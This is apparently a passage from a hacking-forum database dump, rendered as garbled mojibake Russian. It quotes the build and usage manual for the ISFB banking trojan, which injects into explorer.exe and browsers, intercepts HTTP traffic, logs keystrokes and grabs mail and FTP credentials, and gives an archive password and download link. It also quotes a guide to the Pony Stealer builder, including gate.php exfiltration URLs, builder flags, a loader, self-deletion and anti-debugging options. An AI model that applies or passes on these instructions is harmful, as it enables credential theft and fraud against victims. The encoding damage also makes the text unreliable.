ôõтðûø\r\n\r\nÃâ€Ã‘€Ã¾Ã¿ÃµÑ€ - ÿрþóрðüüð уÑÂтðýþòúø.\r\nÃâ€Ã‘€Ã¾Ã¿ÃµÑ€ ÿрõôÑÂтðòÃȄÂõт ÑÂþñþù øÑÂÿþûýÑÂõüыù фðùû Windows (PE32). Ã’ фðùûõ, ò òøôõ ñøýðрýþóþ рõÑÂурÑÂð, ÑÂþôõрöÑÂÑ‚ÑÂÑ \r\nôòõ уÿðúþòðýыõ DLL: 32Ñ… ñøтýыù ø 64Ñ…-ñøтýыù ñþт.\r\nßрø ÑÂтðртõ ôрþÿõр рðÑÂÿðúþòыòðõт DLL ø рõóøÑÂтрøруõт øх ôûѠðòтþ÷ðÿуÑÂúð. \r\nDLL рðÑÂÿðúþòыòðютÑÂѠø рõóøÑÂтрøруютÑÂѠтðúøü þñрð÷þü, чтþñы øüõть òþ÷üþöýþÑÂть òыÿþûýÑÂтьÑÂѠÿрø ûюñþü урþòýõ ÿрøòõûõóøù: \r\n úðú ÿрø ðôüøýøÑÂтрðтþрõ, тðú ø ÿрø ÿþûь÷þòðтõûõ.\r\n\r\nDLL - ñþт.\r\nÑþт ÿрõôÑÂтðòÃȄÂõт ÑÂþñþù ôøýðüøчõÑÂúø ÷ðóруöðõüую ñøñûøþтõúу (DLL). Ãâ€Ã»Ñ ÃºÃ°Ã¶Ã´Ã¾Ã¹ ðрхøтõúтуры ÑÂþñøрðõтÑÂÑ ÑÂòþÑÂ, ÑÂþþтòõтÑÂтòующðÑÂÑ DLL.\r\nDLL-ñþт ÷ðóруöðõтÑÂѠòþ òÑÂõ ÷ðÿуÑÂúðõüыõ ÿрþцõÑÂÑÂÑ‹.\r\nÑþт ÑÂþÑÂтþøт ø÷ 2Ñ… ûþóøчõÑÂúøх úþüÿþýõýтþò: ÿðрÑÂõр ø ÑÂõрòõр. ßðрÑÂõр ðúтøòøруõтÑÂѠò úþýтõúÑÂтõ ÿрþцõÑÂÑÂð-ñрðу÷õрð.\r\náõрòõр ðúтøòøруõтÑÂѠò úþýтõúÑÂтõ ÿрþцõÑÂÑÂð þñþûþчúø (úðú ÿрðòøûþ explorer.exe).\r\n\r\nßðрÑÂõр òыÿþûýÑÂõт ÑÂûõôующøõ фуýúцøø:\r\n- þтÿрðòúð/ÿþûучõýøõ ôðýýых (ÿþûучõýøõ úþüðýô, úþýфøóþò; þтÿрðòúð фþрü, фðùûþò)\r\n- ýõÿþÑÂрõôÑÂтòõýýыù ÿõрõхòðт, ðýðûø÷, ø üþôøфøúðцøѠHTTP трðффøúð\r\n\r\náõрòõр (ò úþýтõúÑÂтõ explorer.exe) òыÿþûýÑÂõт:\r\n- фðùûþòыõ þÿõрðцøø (ÿþøÑÂú, ÑÂþ÷ôðýøõ ø уôðûõýøõ фðùûþò)\r\n- ÷ðÿуÑÂú ÿрþóрðüü, þñýþòûõýøõ\r\n- ÑÂøÑÂтõüýыõ фуýúцøø (ÿõрõ÷ðóру÷úð, ñûþúøрþòúð Þá)\r\n\r\nâðúøü þñрð÷þü, òÑÂõ þÿõрðцøø, трõñующøõ ÿрøòõûõóøù, òыÿþûýÑÂÑŽÑ‚ÑÂÑ ÑÂõрòõрþü ò úþýтõúÑÂтõ explorer.exe, \r\nð òÑÂõ þÿõрðцøø Ñ ÑÂõтью øÑÂúûючøтõûьýþ ø÷ ñрðу÷õрð.\r\n\r\n\r\náñþрúð ø ýðÑÂтрþùúð\r\n\r\nßрþõúт ÑÂþñøрðõтÑÂѠÿрø ÿþüþщø Microsoft Visual Studio 2005, ûøñþ ñþûõõ ÿþ÷ôýõù òõрÑÂøø.\r\nÃ’ ÿрþõúт øýтõóрøрþòðý úрøÿтþр, úþтþрыù øÑÂÿþûь÷уõтÑÂѠÿþ-уüþûчðýøю. \r\nÃ’ рõ÷уûьтðтõ ÑÂñþрúø ø úрøÿтþòúø ÿþûучðютÑÂÑ ÑÂûõôующøõ фðùûы:\r\nRelease\\crm_p.exe\r\nRelease\\client_p.dll\r\nx64\\Release\\client_p.dll\r\nÑÂтþ уÿðúþòðýýыõ ø úрøÿтþòðýыõ òõрÑÂøø ñþтð ø ôрþÿõрð, ÿрøчõü ôрþÿõр (фðùû crm_p.exe) ÑÂþôõрöøт ò ÑÂõñõ ôòð ôруóøх.\r\nÃÂõúрøÿтþòðýýыõ òõрÑÂøø ñþтð ûõöðт тðü öõ:\r\nRelease\\crm.exe\r\nRelease\\client.dll\r\nx64\\Release\\client.dll\r\n\r\nÚрþüõ ñþтð, ÿрþõúт òúûючðõт ò ÑÂõñÑÂ:\r\nRelease\\dname.exe - утøûøтð ôûѠóõýõрðцøø ÿÑÂõòôþ-ÑÂûучðùýых ôþüõýýых øüõý;\r\nRelease\\rsakey.exe - утøûøтð ôûѠÿþôÿøÑÂыòðýøѠфðùûþò úþüðýô ø úþýфøóð;\r\nconfig.exe - ÿрþóрðüüð úþýфøóурðтþр.\r\n\r\nÞÑÂýþòýыõ ýðÑÂтрþùúø ÿрþóрðüüы ýðхþôÑÂÑ‚ÑÂѠò фðùûðх id.h ø config.h.\r\nid.h ÑÂþôõрöøт ýþüõр óруÿÿы ñþтð.\r\nconfig.h ÑÂþôõрöøт тðúøõ ÿðрðüõтры úðú: ÑÂÿøÑÂþú уÿрðòÃȄÂющøх ÑÂõрòõрþò, ýð÷òðýøѠURL-þò ôûѠÿþûучõýøѠúþüðýô ø úþýфøóþò,\r\n ø ôûѠþтÑÂыûúø ôðýýых, ð тðúöõ рð÷ûøчýыõ úûючø ø ÿðрðüõтры òûøÑÂющøõ ýð ýðÑÂтрþùúу ÿрþóрðüüы.\r\n \r\n\r\náñþрúð Ѡñøûôõрþü\r\n\r\náущõÑÂтòуõт òþ÷üþöýþÑÂть ÑÂþñрðть ISFB тðú, чтþñы ò ôðûьýõùшõü ÿрøúрõÿÃȄÂть ú DLL úûючø ø фðùûы ýðÑÂтрþõú,\r\n ýõ ÿõрõÑÂþñøрðѠÿрþõúт.\r\n\r\n1. áþñрðть ISFB ò úþýфøóурðцøø Release(Builder) ÿþô x86 ø x64.\r\n2. Þтрõôðúтøрþòðть фðùûы: \\public.key ø \\client.ini, ÑÂþôõрöðщøõ RSA-úûюч ø ýðÑÂтрþùúø ÿрþóрðüüы ÑÂþþтòõтÑÂтòõýýþ.\r\n3. Ã’ úþýÑÂþûьýþü þúýõ òыÿþûýøть build.bat ø÷ ÿðÿúø \\Builder\r\n4. ×ðñрðть óþтþòыù installer.exe ø÷ ÿðÿúø \\Builder\\Release\r\n\r\nÑðтýøú build.bat ÷ðÿуÑÂúðõт ñøûôõр, úþтþрыù ÿрøúрõÿÃȄÂõт ú úðôöþù DLL (ôûѠх86 ø Ñ…64) фðùûы: \r\n public.key ø client.ini.\r\nÃ’ ÿþÑÂûõôÑÂтòøø þñõ DLL ÿрøúрõÿÃȄÂÑŽÑ‚ÑÂѠú øýÑÂтðûûõру.\r\nÓþтþòыù øýÑÂтðûûõр ÑÂþхрðýÑÂõтÑÂѠò фðùû \\Release\\install.exe\r\n\r\n\r\náñþрúð Ñ BK\r\n\r\náущõÑÂтòуõт òþ÷üþöýþÑÂть ÑÂþñрðть ISFB òüõÑÂтõ BK ò þôøý øÑÂÿþûýÑÂõüыù фðùû-уÑÂтðýþòщøú, тðú, чтþñы ò ÑÂûучðõ\r\n þшøñúø ÿрø уÑÂтðýþòúõ BK, уÑÂтðýþфщøú ø÷òûõúðû DLL ø уÑÂтðýðòûøòðû øх þтôõûьýþ.\r\nßрøüõчðýøõ: ÿðÿúð, ÑÂþôõрöðщðѠÑÂþûюшõý Ñ BK2 ôþûöõýð ýðхþôøтьÑÂѠò тþù öõ ôøрõúтþрøø, чтþ ø ÿðÿúð, ÑÂþôõрöðщðѠISFB.\r\n\r\n1. áþñрðть BK ò úþýфøóурðцøø Release ÿþô Ñ…86 ø Ñ…64.\r\n2. áþñрðть ISFB ò úþýфøóурðцøø Release(Builder) ÿþô x86 ø x64.\r\n3. Þтрõôðúтøрþòðть фðùûы: \\public.key ø \\client.ini.\r\n4. Ã’ úþýÑÂþûьýþü þúýõ ÷ðÿуÑÂтøть bkbuild.bat ø÷ ÿðÿúø \\Builder\r\n5. ×ðñрðть ÑÂþñрðýыù bksetup.exe, ÑÂþôõрöðщøù BK, ISFB-DLL ø ISFB-øýÑÂтðûûõр, ø÷ \\Builder\\Release\r\n\r\n\r\nà ðñþтð ò рõöøüõ øýöõúтð ø÷ ÿðüÑÂтø\r\n\r\nÃâ€Ã»Ñ Ñ€Ã°Ã±Ã¾Ñ‚Ñ‹ ò рõöøüõ øýöõúтð ø÷ ÿðüÑÂтø ýõþñхþôøüþ уÑÂтðýþòøть ÷ýðчõýøõ фûðóð _INJECT_AS_IMAGE ò фðùûõ \\common\\main.h ò\r\n TRUE, ø ÿõрõÑÂþñрðть ÿрþõúт. Ã’ ÑÂтþü ÑÂûучðõ øýÑÂтðûûõр ýõ ÑÂþ÷ôðõт DLL ýð ôøÑÂúõ, ð úþÿøруõт ÑÂõñѠò þôýу ø÷ ÑÂøÑÂтõüýых ÿðÿþú \r\n ø рõóøÑÂтрøруõтÑÂѠò Windows AutoRun. \r\nßрø ÷ðÿуÑÂúõ øýÑÂтðûûõр øýöõúтøт þñрð÷ DLL, ÑÂþþтòõтÑÂтòующõù ðрхøтõúтуры, ò Explorer.exe, þтúуôð, ò ÑÂòþю þчõрõôь,\r\n ÑÂþþþтòõтÑÂтòующøù þñрð÷ DLL øýõúтøтÑÂѠòþ òÑÂõ ÿþрðöôðõüыõ ÿрþцõÑÂÑÂÑ‹, рð÷ýых ðрхøтõúтур.\r\n\r\n\r\nßûðóøýы\r\n\r\nISFB ÿþôôõрöøòðõт ÿûðóøýы: ÑÂÿõцøðûьýþ ÑÂþñрðýыõ, DLL, ÑÂúÿþртøрующøõ фуýúцøю PluginRegisterCallbacks ø òы÷ыòðющøõ\r\n òýутрõýýøõ фуýúцøø ÑÂþфтð (ýðÿрøüõр, фуýúцøø þтÿрðòúø ôðýýых).\r\nÃâ€Ã»Ñ Ã·Ã°Ã³Ñ€ÑƒÃ·ÃºÃ¸ ÿûðóøýð øÑÂÿþûь÷уõтÑÂѠúþüðýôð:\r\n LOAD_PLUGIN=URL[,URL] - óôõ ÿõрòыù URL ôûѠ32Ñ…-ñøтýþù òõрÑÂøø DLL, òтþрþù - 64x-ñøтýþù.\r\náþфт ÑÂúðчøòðõт DLL ÑÂþþтòõтÑÂтòующõù ðрхøтõúтуры ø øýöõúтøт õё ò explorer.exe, ÷ðтõü òы÷ыòðõтÑÂѠфуýúцøѠ\r\n PluginRegisterCallbacks, ò úþтþрую ÿõрõôðётÑÂѠуúð÷ðтõûь ýð ÑÂÿøÑÂþú úþûûñÑÂúþò (фуýúцøù), рõðûø÷þòðýых\r\n òýутрø ÑÂþфтð, úþтþрыõ üþöõт øÑÂÿþûь÷þòðть ÿûðóøý.\r\nÞÿøÑÂðýøõ ÑÂтруúтур ø ÿрþтþтøÿþò фуýúцøù ôÃȄʄÂþ÷ôðýøѠÿûðóøýþò ýðхþôøтÑÂѠò фðùûõ \\common\\plugin.h\r\n\r\n\r\náþÑÂтðò ÿрþõúтð\r\n\r\n\\AcDLL - ñøñûøþтõúð øýöõúтþò. à õðûø÷уõт üõхðýø÷ü øýöõúтð DLL òþ òÑÂõ ÿþрðöôðõüыõ ÿрþцõÑÂÑÂÑ‹, ýõ÷ðòøÑÂøüþ þт ðрхøтõúтуры. \r\n ßþôôõрöøòðõт ôòð рõöøüð рðñþты: øýöõúт, ýõÿþÑÂрõôÑÂтòõýýþ DLL ø øýöõúт þñрð÷ð DLL ø÷ ÿðüÑÂтø ñõ÷ ÑÂþ÷ôðýøѠфðùûð ýð ôøÑÂúõ.\r\n\\ApDepack - ñøñûøþтõúð ýð þÑÂýþòõ APLIB, рõûø÷ующðѠфуýúцøø рðÑÂÿðúþòúø.\r\n\\BcClient - ñøñûøþтõúð úûøõýтð ôûѠñÑÂúúþýõúт ÑÂõрòõрð.\r\n\\Client - þÑÂýþòýðѠDLL ÿрøûþöõýøÑÂ\r\n\\Common - ñøñûþøþтõúð, рõðûø÷ующðѠþñщøõ фуýúцøø, øÑÂÿþûь÷уõüыõ ò рð÷ýых чðÑÂÑ‚ÑÂÑ… ÿрþõúтð. âðúøõ úðú: чтõýøõ фðùûþò, úûючõù рõõÑÂтрð, \r\n þÿõрðцøø Ѡÿþтþúðüø ôðýýых, ÑÂþ ÑÂтрþúðüø, Ñ XML, хуúø ø Ñ‚.ÿ.\r\n\\Crypto - ñøñûøþтõúð úрøÿтþóрðфøчõÑÂúøх фуýúцøù. à õðûø÷уõт ÑÂûõôующøõ ðûóþрøтüы: CRC32, BASE64, MD5, RSA, RC6, AES, DES, SHA1.\r\n ØÑÂÿþûь÷уõтÑÂѠôûѠÿþôÿøÑÂø úþýфøó-фðùûþò ø фðùûþò úþüðýô, ð тðúöõ, ôÃȄʄÂðршøфрþòúø øýфþрüðцøø e-mail ø ftp ðúúðуýтþò.\r\n\\Dname - ÿрþóрðüüð óõýõрðцøø ôþüõýýых øüёý ýð þÑÂýþòõ ýþüõрð óруÿÿы ÑÂþфтð ø тõúущõù ôðты.\r\n\\Ftp - ñøñûøþтõúð FTP-óрðññõрþò.\r\n\\Handle - ñøñûøþтõúð, рõðûø÷ующðѠхÑÂш тðñûøцу. ØÑÂÿþûь÷уõтÑÂѠôûѠÿрøòÑÂ÷úø Ñ…ÑÂýôûþò HTTP ÷ðÿрþÑÂþò ú òýутрõýýõüу úþýтõúÑÂту ISFB.\r\n âðúöõ, øÑÂÿþûь÷уõтÑÂѠúõùûþóóõрþü, ôûѠóруÿÿøрþòúø úûðòøðтурýых ûþóþò ÿþ PID-ðü ø HWND.\r\n\\IM - DLL-ÿûðóøý, рõðûø÷ующðѠóрðññõр Instant Messangers.\r\n\\Install - ÿрþóрðüüð-уÑÂтðýþòщøú ISFB.\r\n\\KeyLog - ñøñûøþтõúð úõùûþóóõр.\r\n\\Mail - ñøñûøþтõúð E-mail óрðññõрþò.\r\n\\RsaKey - ÿрþóрðüüð ôûѠшøфрþòðýøѠø цøфрþòþù ÿþôÿøÑÂø úþýфøó-фðùûþò ø фðùûþò úþüðýô.\r\n\\SocksLib - ñøñûøþтõúð, рõðûø÷ующðѠSOCKS4\\5-ÑÂõрòõр.\r\n\\Sqlite3 - ñøñûøþтõúð ôûѠрðñþты ѠÑÆSQLLite. ØÑÂÿþûь÷уõтÑÂÑ IM-óрðññõрðüø.\r\n\\ZConv - ÿрþóрðüüð-úþýòõртõр úþýфøóþò Zeus ò úþýфøó-фðùûы ISFB.\r\n\r\n[/QUOTE]\r\n\r\nPwd - w0rm.pw\r\n\r\n_https://mega.co.nz/#!ZZdmjbza!-yILTYqyBurZhX1P6MxPVE_AHvpncDwfH-gHtRU1IIo', 1, 0, '141.101.104.15', 0, 1, 0, 0, 0),
(1084, 1066, 0, 'skiffha', 10, 'Pony Stealer', 1403525482, '[QUOTE]\r\n-=- áøÑÂтõüð ÑÂñþрð FTP ÿðрþûõù \"Pony\" -=-\r\n\r\nÑøûôõр \"PonyBuilder.exe\"\r\n========================\r\n\r\n×ðôðчð ñøûôõрð - ýðÑÂтрþøть ø ÑÂúþüÿøûøрþòðть úûøõýт \"Pony.exe\", úþтþрыù ýõþñхþôøüþ ÿрþóруöðть ýð ÷ðрðöõýýыõ úþüÿьютõры.\r\n\r\nÚþüÿûõúт ÿþÑÂтðòúø:\r\n\r\n* ßðÿúð \"masm32\" - úþüÿøÃȄÂтþр Microsoft Macro Assembler (MASM).\r\n* ßðÿúð \"PonySrc\" - øÑÂхþôýыù úþô ýð ÑÂ÷ыúõ MASM ÿрþóрðüüы-úûøõýтð (óрðññõрð) \"Pony.exe\".\r\n* ßðÿúð \"BuilderSrc\" - øÑÂхþôýыù úþô ýð ÑÂ÷ыúõ Delphi 7 òÑÂÿþüþóðтõûьýþù ÿрþóрðüüы-ñøûôõрð \"PonyBuilder.exe\".\r\n* äðùû \"PonyBuilder.exe\" - ÿрþóрðüüð-ñøûôõр ôûѠúûøõýтð \"Pony.exe\".\r\n* äðùû \"Help.txt\" - фðùû ÿþüþщø.\r\n* äðùû \"build.bat\" - ÑÂúрøÿт øÑÂÿþûь÷уõüыù ñøûôõрþü ôûѠúþüÿøÃȄÂцøø ñøûôð ø÷ øÑÂхþôýøúþò \"PonySrc\".\r\n* äðùû \"Pony.ico\" - øúþýúð ÿрøúрõÿÃȄÂõüðѠú \"Pony.exe\" ÿрø úþüÿøÃȄÂцøø, õÑÂûø ò ñøûôõрõ òыñрðýð ÑÂþþтòõтÑÂòующðѠþÿцøÑÂ.\r\n\r\nØýтõрфõùѠрð÷ôõûõý ýð 4 ÷ðúûðôúø:\r\n\r\n1. Ñøûôõр\r\n âõúÑÂтþòþõ ÿþûõ \"áÿøÑÂþú URL ôûѠþтÿрðòúø ÿðрþûõù\" - ÷ôõÑÂÑŒ üþöýþ ÿрþÿøÑÂðть ÑÂÿøÑÂþú URL óõùтþò ôûѠþтÿрðòúø ÿðрþûõù.\r\n ÚðöôðѠÑÂтрþúð - þтôõûьýыù URL, ú ÿрøüõру: [url]http://somedomain.com/dir/gate.php[/url]\r\n Üþöýþ ôþñðòøть ýõþóрðýøчõýýþõ úþûøчõÑÂтòþ ÑÂтрþú (URL), þôøý ø тþт öõ URL üþöýþ ôþñðòøть ýõÑÂúþûьúþ рð÷.\r\n Ãâ€Ã¾Ã¼ÃµÃ½ üþöõт ÑÂþôõрöðть øýфþрüðцøю þ ÿþртõ ÿþôúûючõýøÑÂ, ú ÿрøüõру: [url]http://privatedomain.com:8080/gate.php[/url]\r\n ßрþтþúþû https:// ýð ôðýýыù üþüõýт ýõ ÿþôôõрöøòðõтÑÂÑÂ.\r\n \"Pony.exe\" ñуôõт ÿытðтьÑÂѠÿþôúûючøтьÑÂѠø þтÿрðòøть þтчõт ѠÿðрþÃȄÂüø ÿþ ÑÂÿøÑÂúу, õÑÂûø ôðýýыõ ñуôõт уÑÂÿõшýþ ôþÑÂтðòûõýы,\r\n ÿрþóрðüüð ýõüõôûõýýþ ÷ðòõршøт рðñþту ñõ÷ ÿþÿытþú ÿþôúûючõýøѠú þÑÂтðûьýыü URL.\r\n\r\n Úýþÿúð \"Òыñрðть øúþýúу\" ÿþ÷òþÃȄÂõт уÑÂтðýþòøть øúþýúу ôûѠúþüÿøûøруõüþóþ фðùûð, ÿþôôõрöøòðõтÑÂѠтþûьúþ фþрüðт *.ico.\r\n Úýþÿúð \"áþ÷ôðть ñøûô\" úþüÿøûøруõт фðùû \"Pony.exe\" Ѡ÷ðôðýýыüø ýðÑÂтрþùúðüø.\r\n\r\n2. Ûþðôõр\r\n ßрþÑÂтþù ûþðôõр (÷ðóру÷чøú фðùûþò). ßþÑÂûõ ÑÂñþрð ÿðрþûõù Ѡуúð÷ðýýых ûøýúþò (URL) ñуôут ÷ðóруöõýы ø ÷ðÿущõýы фðùûы.\r\n URL ÷ðôðютÑÂѠтðúøü öõ þñрð÷þü, úðú ø ÑÂÿøÑÂþú ôþüõýþò ôûѠþтÿрðòúø ÿðрþûõù.\r\n Ã’ ýøöýõù чðÑÂтø ÷ðúûðôúø üþöýþ ÷ðôðть ÑÂûõôующøõ þÿцøø:\r\n * ÃÂúтøòøрþòðть ûþðôõр - òúûючøть рðñþту ûþðôõрð, øýðчõ фðùûы ÷ðóруöðтьÑÂѠýõ ñуôут.\r\n * ÃÂõ ÷ðÿуÑÂúðть þôøýðúþòыõ фðùûы ôòðöôы - ÿþÑÂûõ уÑÂÿõшýþóþ ÷ðÿуÑÂúð ÑÂúðчðýýþóþ фðùûð ò рõõÑÂтр ñуôõт ôþñðòûõýþ úþýтрþûьýþõ ÷ýðчõýøõ\r\n (хõш) ôðýýых фðùûð, ÿþÑÂûõ чõóþ, ÿрø ÿþòтþрýþù ÷ðóру÷úõ, ôуñûøúðт ÷ðÿущõý ýõ ñуôõт.\r\n\r\n3. ÃÂðÑÂтрþùúø\r\n Ãâ€Ã»Ñ Ñ‚þóþ, чтþñы уòøôõть òÑÂõ ýðÑÂтрþùúø, ýуöýþ ðúтøòøрþòðть þÿцøю \"ßþúð÷ðть ÿрþôòøýутыõ ýðÑÂтрþùúø\" ò óûðòýþü üõýю.\r\n * áöøüðть - ÑÂöøüðть þтчõты Ѡÿþüþщью ñøñûøþтõúø aPLib, ÿрøñðòÃȄÂõт þúþûþ 5Úñ ú рð÷üõру øÑÂÿþûýÑÂõüþóþ фðùûð,\r\n хþрþшþ ÿðúуõт тõúÑÂтþòыõ ôðýýыõ ÿõрõô þтÿрðòúþù, ýðÑÂтþÑÂтõûьýþ рõúþüõýôуõтÑÂѠøÑÂÿþûь÷þòðть, ÑÂøûьýþ ÑÂýøöðõт трðфøú\r\n ú ÑÂõрòõру.\r\n * èøфрþòðть - шøфрþòðть þтчõты ðûóþрøтüþü RC4.\r\n * ßðрþûь шøфрþòðýøѠ- ÿðрþûь, úþтþрыü шøфруютÑÂѠþтчõты, ðýðûþóøчýыù ÿðрþûь ýõþñхþôøüþ уÑÂтðýþòøть ò ýðÑÂтрþùúðх ÑÂõрòõрð.\r\n * áþхрðýÑÂть þтчõты ýð ôøÑÂú (ôûѠþтûðôúø) - ÿрø ÷ðÿуÑÂúõ \"Pony.exe\", ÿþÑÂûõ тþóþ úðú ñыûø ÑÂþñрðýы ÿðрþûø, ò тþù öõ ÿðÿúõ \r\n óôõ ñыû ÷ðÿущõý øÑÂÿþûýÑÂõüыù фðùû, ñуôõт ÑÂþ÷ôðý фðùû \"out.bin\", ÑÂтþ úþýтõùýõр ѠÿðрþÃȄÂüø ò тðúþü òøôõ, ò úðúþü þý þтÿрðòÃȄÂõтÑÂÑ \r\n ýð ÑÂõрòõр ôûѠÿþÑÂûõôующõù þñрðñþтúø (ôõшøфрþòúø).\r\n * ÞтÑÂыûðть ÿуÑÂтыõ þтчõты (ôÃȄʄÂтðтøÑÂтøúø) - þñычýþ, õÑÂûø ýø þôýþóþ ÿðрþûѠýõ ýðùôõýþ, úûøõýт \"Pony.exe\" ýøчõóþ þтÿрðòÃȄÂть\r\n ÑÂõрòõру ýõ ñуôõт, ýþ øýþóôð ÿþûõ÷ýþ òúûючõýøõ ôðýýþù þÿцøø ôûѠÿþûучõýøѠÑÂтðтøÑÂтøúø þ úþûøчõÑÂтòõ уÑÂÿõшýых ÷ðÿуÑÂúþò \"Pony.exe\".\r\n * à õöøü þтûðôúø - ÑÂýøüðõт ÿõрõхòðтчøú øÑÂúûючõýøù, уñøрðõт úþô ÷ðтруôýÑÂющøù þтûðôúу ø ôø÷ðÑÂÑÂõüñûøрþòðýøõ ÿрþóрðüüы, øÑÂÿþûь÷þòðть øÑÂúûючøтõûьýþ ò цõÃȄÂÑ… þтûðôúø.\r\n * ÞтÑÂыûðть тþûьúþ ýþòыõ þтчõты - õÑÂûø þÿцøѠýõ ðúтøòøрþòðýð, тþóôð ôуñûøрующøõ þтчõты ѠÿðрþÃȄÂüø þтÿрðòÃȄÂтьÑÂѠýõ ñуôут.\r\n * áðüþуôðûõýøõ - ÷ðÿущõýýыù фðùû \"Pony.exe\" ñуôõт уôðûõý ÿþÑÂûõ тþóþ úðú ÷ðòõршøт ÑÂòþю рðñþту.\r\n * Ãâ€Ã¾Ã±Ã°Ã²Ã¸Ñ‚ÑŒ øúþýúу - ÿрøúрõÿøть òыñрðýýую øúþýúу ú úþüÿøûøруõüþüу фðùûу.\r\n * ßðúþòðть ñøûô Ѡÿþüþщью UPX - ÑÂöðть øÑÂÿþûýÑÂõüыù фðùû \"Pony.exe\" ÿþÑÂûõ úþüÿøÃȄÂцøø.\r\n * ÚþûøчõÑÂтòþ ÿþÿытþú þтÿрðòøть þтчõт - ÑÂúþûьúþ рð÷ ÿытðтьÑÂѠþтÿрðòøть þтчõт ÿрø ýõуÑÂÿõшýþù ÿõрõôðчõ, рõúþüõýôуõтÑÂѠуúð÷ðть üøýøüуü 2 ÿþÿытúø\r\n * Òðрøðýт ÑÂñþрúø:\r\n * Exe-фðùû - þñычýыù øÑÂÿþûýÑÂõüыù фðùû Windows (*.exe)\r\n * Dll-фðùû - òðрøðýт ÑÂñþрúø ò òøôõ .dll ñøñûøþтõúø, þýð ðñÑÂþûютýþ ðòтþýþüýð, ôûѠþтрðñþтúø ýõþñхþôøüþ òы÷òðть ø÷ òðшõóþ ÿрþõúтð ûøшь API-фуýúцøю LoadLibrary(), Ñ‚.õ. URL ôûѠþтÿрðòúø ÿðрþûõù \r\n ø òÑÂõ ýðÑÂтрþùúø òшøòðютÑÂѠò ÑÂðü .dll фðùû. Ã’ ÿðÿúõ DllTest ûõöøт ÿрþÑÂтþù ÿрøüõр øÑÂÿþûь÷þòðýøÑÂ-тõÑÂтøрþòðýøÑÂ, ò ÑÂту öõ ÿðÿúу ýõþñхþôøüþ ÿþûþöøть фðùû Pony.dll, ÿþÑÂûõ чõóþ ÷ðÿуÑÂтøть фðùû DllTest.exe,\r\n úþтþрыù ò ÑÂòþю þчõрõôь òы÷ыòðõт LoadLibrary() ôûѠ.dll ñøñûøþтõúø.\r\n\r\n Ã’ ÑÂÿøÑÂúõ \"Ãâ€Ã¾ÑÂтуÿýыõ üþôуûø ôõшøфрþòúø\" üþöýþ øÑÂúûючøть ø÷ ñøûôð ýõýуöýыõ ôõшøфрþòщøúø ÿðрþûõù, ÑÂтþ уüõýьшøт рð÷üõр ñøûôð.\r\n\r\n4. áúøý\r\n ÃÂð ÑÂтþù ÷ðúûðôúõ üþöýþ òыñрðть ÿþýрðòøòшøùÑÂÑ ÑÂúøý (шúурúу) ñøûôõрð.\r\n\r\n×ðÿуÑÂú ñøûôõрð Ѡúþüðýôýþù ÑÂтрþúø\r\n=================================\r\n\r\nÃâ€Ã¾ÑÂтуÿýы ÑÂûõôующøõ ðрóуüõýты úþüðýôýþù ÑÂтрþúø ñøûôõрð:\r\n-PACK_REPORT - ÑÂöøüðть þтчõты\r\n-ENCRYPT_REPORT - шøфрþòðть þтчõты, õÑÂûø ÿðрþûь шøфрþòðýøѠýõ ÷ðôðý, тþ ÿþ уüþûчðýøю ñуôõт уúð÷ðý \"Mesoamerica\"\r\n-REPORT_PASSWORD= - ÿðрþûь шøфрþòðýøÑÂ, ú ÿрøüõру: -REPORT_PASSWORD=Mesoamerica\r\n-SAVE_REPORT - ÑÂþхрðýÑÂть þтчõты ýð ôøÑÂú (ôûѠþтûðôúø)\r\n-ENABLE_DEBUG_MODE - рõöøü þтûðôúø\r\n-SEND_MODIFIED_ONLY - þтÑÂыûðть тþûьúþ ýþòыõ þтчõты\r\n-SELF_DELETE - ðúтøòøрþòðть ÑÂðüþуôðûõýøõ\r\n-SEND_EMPTY_REPORTS - þтÑÂыûðть ÿуÑÂтыõ þтчõты\r\n-ADD_ICON - ÿрøúрõÿøть øúþýúу ø÷ фðùûð Pony.ico\r\n-UPX - ÿðúþòðть ñøûô Ѡÿþüþщью UPX\r\n-DOMAIN_LIST= - ÑÂÿøÑÂþú ôþüõýþò, úðöôыù ôþüõý ôþûöõý ñыть рð÷ôõûõý Ѡÿþüþщью ÑÂÿõц. ÑÂøüòþûð \\n, ú ÿрøüõру: -DOMAIN_LIST=http://host.com/gate.php\\nhttp://host2.com/x/gate.php\r\n-LOADER_LIST= - ÑÂÿøÑÂþú URL ôûѠûþðôõрð (ñуôõт ðúтøòøрþòðý ðòтþüðтøчõÑÂúø ÿрø ýðûøчøø URL), úðöôыù URL ôþûöõý ñыть рð÷ôõûõý ðýðûþóøчýþ DOMAIN_LIST\r\n-LOADER_EXECUTE_NEW_FILES_ONLY - ýõ ÷ðÿуÑÂúðть þôøýðúþòыõ фðùûы ôòðöôы\r\n-DISABLE_MODULE= - øÑÂúûючøть ø÷ ñøûôð þÿрõôõûõýýыù üþôуûь ôõшøфрþòúø (òÑÂõ ýð÷òðýøѠüþôуûõù üþöýþ уòøôõть ò фðùûõ PonySrc\\FTPClients.asm), ú ÿрøüõру: -DISABLE_MODULE=MODULE_OPERA\r\n-DLL_MODE - øÑÂÿþûь÷þòðть òðрøðýт ÑÂñþрúø ò òøôõ Dll-ñøñûøþтõúø\r\n-COLLECT_HTTP - ôþÿþûýøтõûьýþ ÑÂþñøрðть ø HTTP/HTTPS ÿðрþûø\r\n-COLLECT_EMAIL - ôþÿþûýøтõûьýþ ÑÂþñøрðть ø E-mail ÿðрþûø (POP3, IMAP, SMTP)\r\n-UPLOAD_RETRIES=N - úþûøчõÑÂтòþ (N) ÿþÿытþú þтÿрðòøть þтчõт, õÑÂûø ÷ýðчõýøõ ýõ уúð÷ðýþ, тþ ÿþ уüþûчðýøю øÑÂÿþûь÷уютÑÂÑ 2 ÿþÿытúø\r\n\r\nÚûøõýт \"Pony.exe\"\r\n=================\r\n\r\n×ðôðчð \"Pony.exe\" - ÑÂþñрðть ÿðрþûø Ѡúþüÿьютõрð ø þтÿрðòøть øх ýð ÑÂõрòõр ôûѠÿþÑÂûõôующõù þñрðñþтúø.\r\n\r\nà ðñþтðõт ýð òÑÂõх NT òõрÑÂøÑÂÑ… Windows, ýðчøýðѠѠWin98, òúûючðѠÑÂõрòõрýыõ. ßþôôõрöøòðõтÑÂѠрðñþтð ò рõöøüõ x86 ø x64.\r\nßрþóрðüüð ýþрüðûьýþ þтрðñðтыòðõт ÿрø ÷ðÿуÑÂúõ Ѡÿрðòðüø ðôüøýøÑÂтрðтþрð øûø ÿþûь÷þòðтõÃȄÂ.\r\n\r\nßõрõô рðÑÂÿрþÑÂтрðýõýøõü фðùû öõûðтõûьýþ ÿþчøÑÂтøть ø úрøÿтðýуть.\r\n\r\nà õðûø÷þòðýð 